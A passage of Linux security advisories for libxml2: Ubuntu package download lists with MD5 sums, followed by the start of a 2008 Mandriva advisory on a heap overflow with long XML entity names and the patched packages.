http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb\n      Size/MD5:   174772 567a3fdd900bc9cb34e5f2f668e48851\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.diff.gz\n      Size/MD5:    66035 c629b5480445cc4380bf3bae181d8484\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.dsc\n      Size/MD5:     1072 67e7f23a4d73713a67233d554f6c8b5c\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg.orig.tar.gz\n      Size/MD5:  3442959 8498d4e6f284d2f0a01560f089cb5a3e\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.31.dfsg-2ubuntu1.4_all.deb\n      Size/MD5:  1302458 9454932b37039a5af38524f7c4c0b294\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb\n      Size/MD5:   939490 5c561ccc0fe42d44216631b89b1addf2\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_amd64.deb\n      Size/MD5:   754024 1d43d32a7125d4b2ed113c7dbb469bdf\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_amd64.udeb\n      Size/MD5:   580472 d2e2babcee294fdd0f202d5d122c0dd2\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_amd64.deb\n      Size/MD5:    37052 440a067962c6e1e7ffe17071bb33fd09\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb\n      Size/MD5:   832898 b129c03e0971727757567d89a6d32269\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb\n      Size/MD5:   872964 86ab686a437dd9ed2b1ea08dbd5d9ba1\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb\n      Size/MD5:   297976 8acf0cdf5242fd3e6edd957db9e19c28\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb\n      Size/MD5:   904990 88fe3df363f8829fcfb9a0ff42aa4e96\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_i386.deb\n      Size/MD5:   676490 641845452580108e68afbd1605af5744\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_i386.udeb\n      Size/MD5:   533328 3e0d900bd1898de03a78fd408800d88e\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_i386.deb\n      Size/MD5:    34042 2061451c337e1b12f73f9f91125aeda2\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb\n      Size/MD5:   786106 664fc7281611ad8b19e5f0b62284878f\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb\n      Size/MD5:   796320 1d531f46ab809a0f58ccdcf75f706ea5\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb\n      Size/MD5:   262966 d26ec52d81b118a64f13657db427f858\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb\n      Size/MD5:   931054 830e464f765c3109497514d96295c932\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_lpia.deb\n      Size/MD5:   679546 6f6ee1fe040963315471c2a2a15064d6\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_lpia.udeb\n      Size/MD5:   529214 af124b039059f2f24f31c50fc8fbf48f\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_lpia.deb\n      Size/MD5:    34488 ef4c4ea4e96d66c6d5c36e2645379915\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb\n      Size/MD5:   781436 ae5efc717942777be05db9c550d5ddd5\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb\n      Size/MD5:   788580 c16e8d94ecb5f1a14655fc4d40671f97\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb\n      Size/MD5:   259630 143a179bfbcff152d9f33c424ea80229\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb\n      Size/MD5:   923448 d3ca8a5978632bec93151a892072b5c4\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_powerpc.deb\n      Size/MD5:   776284 92d1fb876bb167fccee4e5a6a82e8169\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_powerpc.udeb\n      Size/MD5:   564078 9d75d8f965c320fd17dc2c420aa6e325\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_powerpc.deb\n      Size/MD5:    42060 8bedb52b8485e7b65b930a39a671cbd8\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb\n      Size/MD5:   816678 55d6f855ea9b7b14f2ce449079360f80\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb\n      Size/MD5:   841354 b66c89a166c8a92ed136f77e2693249b\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb\n      Size/MD5:   285362 adc160daa3848983f4ddb678c3345199\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb\n      Size/MD5:   826326 f596d405cff24bfa70d8c2ff81e3439b\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_sparc.deb\n      Size/MD5:   719830 b0cb8e2bbbec82604b5a562f3e446f78\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_sparc.udeb\n      Size/MD5:   541066 f5796b6b3175b740eb55ab32887c98f1\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_sparc.deb\n      Size/MD5:    36190 1e5ae0d677b95e4f5b69c86ab7207c04\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb\n      Size/MD5:   793408 c10a54dbfe118a255b353b59fee0c895\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb\n      Size/MD5:   807914 3566e097583445477cad63cd721424f1\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb\n      Size/MD5:   277520 b0c2ed5aafa41ff970a5d8c40a12d02d\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.diff.gz\n      Size/MD5:    84498 bc3004e4fd1e98246801b2a5741be0f1\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.dsc\n      Size/MD5:     1494 5a25281495f4e6650a45f45a5a8526d2\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz\n      Size/MD5:  3425843 bb11c95674e775b791dab2d15e630fa4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-4ubuntu1.2_all.deb\n      Size/MD5:  1308242 3aa37d0a971702bda21165e2744d3b15\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb\n      Size/MD5:  1014608 676fed67244fe42800b527d2d654365f\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_amd64.deb\n      Size/MD5:   777674 72fd0dc6223b0708f936bfbf830b42a4\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_amd64.udeb\n      Size/MD5:   607400 82a0a91ff27913e1284ae7799156b9a5\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_amd64.deb\n      Size/MD5:    37346 b71638a425beef5adb16962d2dbf83f8\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb\n      Size/MD5:   863410 2141203bc6e460099878831efdc9de8e\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb\n      Size/MD5:   858904 3143613cc83f8f3b3fc171291e48f30c\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb\n      Size/MD5:   296128 4f123d82f7393dc6271adee9b0b2154b\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb\n      Size/MD5:   966962 48d67569f459f88564f282c5c7603eca\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_i386.deb\n      Size/MD5:   701786 f31b1ec9b00b32aef5dab08de74c1ca5\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_i386.udeb\n      Size/MD5:   563618 6c10444d19aa3010ec0b6afc46631442\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_i386.deb\n      Size/MD5:    33908 218bd1ab9dbed3bb7e56db1f1ac74a6a\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb\n      Size/MD5:   819242 f2e5722dc46494b105d2e171a7ab8230\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb\n      Size/MD5:   782502 c6a12f97a9d05c420e87d98f3cebe292\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb\n      Size/MD5:   261340 c1e353abc1bdf4c56b856228ea92e3ce\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb\n      Size/MD5:   994030 e6260d0cfcac28075fcbe72036374dc1\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_lpia.deb\n      Size/MD5:   697648 2e04c962dc20e83f635a5bf06fb87691\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_lpia.udeb\n      Size/MD5:   553402 8998361080659f8d3175d3621261805a\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_lpia.deb\n      Size/MD5:    34092 da760a43ac9492e508c6dc6c85499a95\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb\n      Size/MD5:   808888 d3708ffd4d87a2c48c6c37badb602ec5\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb\n      Size/MD5:   776836 ff4dee115d09816a99b2c7ea63e4fd10\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb\n      Size/MD5:   257710 6e2cf4776d778dc7ce2d2a7c098c5bd7\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb\n      Size/MD5:   985370 5f1c540dbfecf08d6ccc22798beb7d0d\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_powerpc.deb\n      Size/MD5:   793178 980f65e0877f36d1c51241ca6e8a4e79\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_powerpc.udeb\n      Size/MD5:   582030 439fe7ebaebd3e5e3c9ca5b323595da6\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_powerpc.deb\n      Size/MD5:    40426 648c47236b411a6b5ccbbe4ca4671af7\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb\n      Size/MD5:   837942 7a59d92fe6c31895aadc67df56e404b2\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb\n      Size/MD5:   822784 44a72a4996bca847bea424ad1db4d03b\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb\n      Size/MD5:   283028 9423c0b24aab87ffac1d85615282e38d\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb\n      Size/MD5:   872662 fcc9c2574a5f8f9aeee5be43cedd9542\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_sparc.deb\n      Size/MD5:   730988 dab6026cfeee8b30a3d7d7a989621cc1\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_sparc.udeb\n      Size/MD5:   551174 de8a4e5e3c69eda8a888e2a4be0d8771\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_sparc.deb\n      Size/MD5:    36538 b1c42f5d79806ca0ddb842d6e46589e4\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb\n      Size/MD5:   807300 2ec0838cfed794ad0dfba8e6c2f8f5a6\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb\n      Size/MD5:   795578 5177c5c668b1cb6ab972a42ba74ce69b\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb\n      Size/MD5:   275720 848f0e32688509c20e716bf56854b3c2\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.diff.gz\n      Size/MD5:    86115 e8ae94cf06df5aa69bcb4e9e3478dc3a\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.dsc\n      Size/MD5:     1494 59db95aea21b88b40de41b4eb6286204\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz\n      Size/MD5:  3425843 bb11c95674e775b791dab2d15e630fa4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5ubuntu4.2_all.deb\n      Size/MD5:  1309904 8a177134aefda1c1803ee8cea7876987\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb\n      Size/MD5:  1014666 7eecb75acf8cfe96f0d8ad00dc6cd0f7\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_amd64.deb\n      Size/MD5:   777666 303a6a64d87e0666177f9ee63cf1a03c\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_amd64.udeb\n      Size/MD5:   607592 f0abee0ba9c7cac159aa282ff04b968d\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_amd64.deb\n      Size/MD5:    37356 e60cf6a423c951786da162ffe21132a1\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb\n      Size/MD5:   864536 fd1367706366bfd805f692c39f331835\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb\n      Size/MD5:   863456 0e646ecc8d3e8e72fc65739a4bae3de9\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb\n      Size/MD5:   359004 6541b0c12852c3e490ddb20c06448eae\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb\n      Size/MD5:   967152 3bc76bac8a99f2bceca5169cf9394f2c\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_i386.deb\n      Size/MD5:   701712 b3aa303a9b2fcdcbdcb62595a6876f86\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_i386.udeb\n      Size/MD5:   563692 fbda90721b32837d401f72def5bae5d4\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_i386.deb\n      Size/MD5:    33904 a3323cb518af641c59ea45369a65746f\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb\n      Size/MD5:   820722 d26fe8acb0a5aee307d06edae3e7e28a\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb\n      Size/MD5:   785386 afdcafaa8bac5e88aa4a13e0d749b2ea\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb\n      Size/MD5:   324412 bae919ee044ef9aaf19656b9d1976b19\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb\n      Size/MD5:   994408 53e4d8355d376154e295df19d3a3c60d\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_lpia.deb\n      Size/MD5:   697522 5222a56651f77e522ca0ad1c6d6d5de6\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_lpia.udeb\n      Size/MD5:   553434 48f46f951b7ebc278e84ad661d306f19\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_lpia.deb\n      Size/MD5:    34098 60966a769f8d75d8bc8253c687e38244\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb\n      Size/MD5:   810434 585824abaa30b7726f8e7beeae6150eb\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb\n      Size/MD5:   778354 6588b53390d8a294fc18ab6624e6c7c1\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb\n      Size/MD5:   320608 cb34801b64a53678cc553625fec3feaf\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb\n      Size/MD5:   985248 ecf8b6d8401aebd949116cb0169a96fe\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_powerpc.deb\n      Size/MD5:   793242 1fc757dad96c16d285df20a5137af4c6\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_powerpc.udeb\n      Size/MD5:   582210 87a282cc9ab3bf5af1015ce0624d01d9\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_powerpc.deb\n      Size/MD5:    40434 3e24add8c4c0aaf0b7931dd185394d6d\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb\n      Size/MD5:   839218 0b75a09404be80b49058058c2aa6e746\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb\n      Size/MD5:   825710 58709b2af622ff835b15f799cd47fcfe\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb\n      Size/MD5:   344720 c07c4729d2191cf51d85654a83e8faf2\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb\n      Size/MD5:   872512 b6f95a836cabc34e1266b76cc250a9e0\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_sparc.deb\n      Size/MD5:   730870 607909857dea94afe8102a7131595252\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_sparc.udeb\n      Size/MD5:   551000 7fbe08e3223c9543645eadb4b9e0167a\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_sparc.deb\n      Size/MD5:    36486 c3540c5aadb1adc3f85f6276a1980d0c\n    http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb\n      Size/MD5:   807954 a3ac3191b768e4b6e1e7b1c279b26a13\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb\n      Size/MD5:   798558 dd9c4b6bf81302a938f71ed0f9cf47c8\n    http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb\n      Size/MD5:   338152 674bae887b0ae673dd4732498c5a738c\n\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2008:192\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : libxml2\n Date    : September 11, 2008\n Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0\n _______________________________________________________________________\n\n Problem Description:\n\n A heap-based buffer overflow was found in how libxml2 handled long\n XML entity names. \n \n The updated packages have been patched to prevent this issue. \n As well, the patch to fix CVE-2008-3281 has been updated to remove\n the hard-coded entity limit that was set to 5M, instead using XML\n entity density heuristics.  Many thanks to Daniel Veillard of Red Hat\n for his hard work in tracking down and dealing with the edge cases\n discovered with the initial fix to this issue. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2007.1:\n 9250adec77a5118119d5000f2305540f  2007.1/i586/libxml2-2.6.27-3.4mdv2007.1.i586.rpm\n 103dba08606f0038f3a9f4107ceba442  2007.1/i586/libxml2-devel-2.6.27-3.4mdv2007.1.i586.rpm\n a388bf596ef6725fb5baadb4e056a0bd  2007.1/i586/libxml2-python-2.6.27-3.4mdv2007.1.i586.rpm\n d2333e42a538101e36eab7d12467e08b  2007.1/i586/libxml2-utils-2.6.27-3.4mdv2007.1.i586.rpm \n 94a25c63f54693b7ac289223a6a3a687  2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n 343f8656039b69716fe712eeb2d1bf4e  2007.1/x86_64/lib64xml2-2.6.27-3.4mdv2007.1.x86_64.rpm\n 320d8dd8245f5ec6db46bedaf07afb3e  2007.1/x86_64/lib64xml2-devel-2.6.27-3.4mdv2007.1.x86_64.rpm\n fb6f52df6831cda42db46502cc761475  2007.1/x86_64/lib64xml2-python-2.6.27-3.4mdv2007.1.x86_64.rpm\n 8440fc08fee99f18a81a32035fac166a  2007.1/x86_64/libxml2-utils-2.6.27-3.4mdv2007.1.x86_64.rpm \n 94a25c63f54693b7ac289223a6a3a687  2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm\n\n Mandriva Linux 2008.0:\n c53b40d9c7ebec036f9175c8f4e87b3b  2008.0/i586/libxml2_2-2.6.30-1.4mdv2008.0.i586.rpm\n 4a4ed97086b52cab3bbd34fe4d7003a0  2008.0/i586/libxml2-devel-2.6.30-1.4mdv2008.0.i586.rpm\n d3898465dc2797a2b20be8310dd4f484  2008.0/i586/libxml2-python-2.6.30-1.4mdv2008.0.i586.rpm\n 34c524fa03b470093bd0b0c679bcb9c4  2008.0/i586/libxml2-utils-2.6.30-1.4mdv2008.0.i586.rpm \n 2dc2f4732992e27aea4c5a098c631ae8  2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 20ac98b346a1f18b90504cb623c530d8  2008.0/x86_64/lib64xml2_2-2.6.30-1.4mdv2008.0.x86_64.rpm\n fd5907e801bf4f64ee79d097fcaec2b6  2008.0/x86_64/lib64xml2-devel-2.6.30-1.4mdv2008.0.x86_64.rpm\n 20f45401e501b9639a9b53d82a4e031f  2008.0/x86_64/libxml2-python-2.6.30-1.4mdv2008.0.x86_64.rpm\n 22be20e194ba2177a47d831ee8c82f47  2008.0/x86_64/libxml2-utils-2.6.30-1.4mdv2008.0.x86_64.rpm \n 2dc2f4732992e27aea4c5a098c631ae8  2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm\n\n Mandriva Linux 2008.1:\n 61e96824adc6e61b2764bb3a85e2e76d  2008.1/i586/libxml2_2-2.6.31-1.3mdv2008.1.i586.rpm\n 6d0cc51d32c7b6ecd609250aad302034  2008.1/i586/libxml2-devel-2.6.31-1.3mdv2008.1.i586.rpm\n 1e7c4ddd30677789de05cc464dde9790  2008.1/i586/libxml2-python-2.6.31-1.3mdv2008.1.i586.rpm\n edd477e34b08f94956eeedd387b5e509  2008.1/i586/libxml2-utils-2.6.31-1.3mdv2008.1.i586.rpm \n b1078a83185c1c97fada7ea5e97df753  2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm\n\n Mandriva Linux 2008.1/X86_64:\n 9d25e809ad31decb111a38301b2a74c1  2008.1/x86_64/lib64xml2_2-2.6.31-1.3mdv2008.1.x86_64.rpm\n f35af82dffc02628edb1ce03113c3ba0  2008.1/x86_64/lib64xml2-devel-2.6.31-1.3mdv2008.1.x86_64.rpm\n 5819b393de9ff05be4d670c8e5d36080  2008.1/x86_64/libxml2-python-2.6.31-1.3mdv2008.1.x86_64.rpm\n 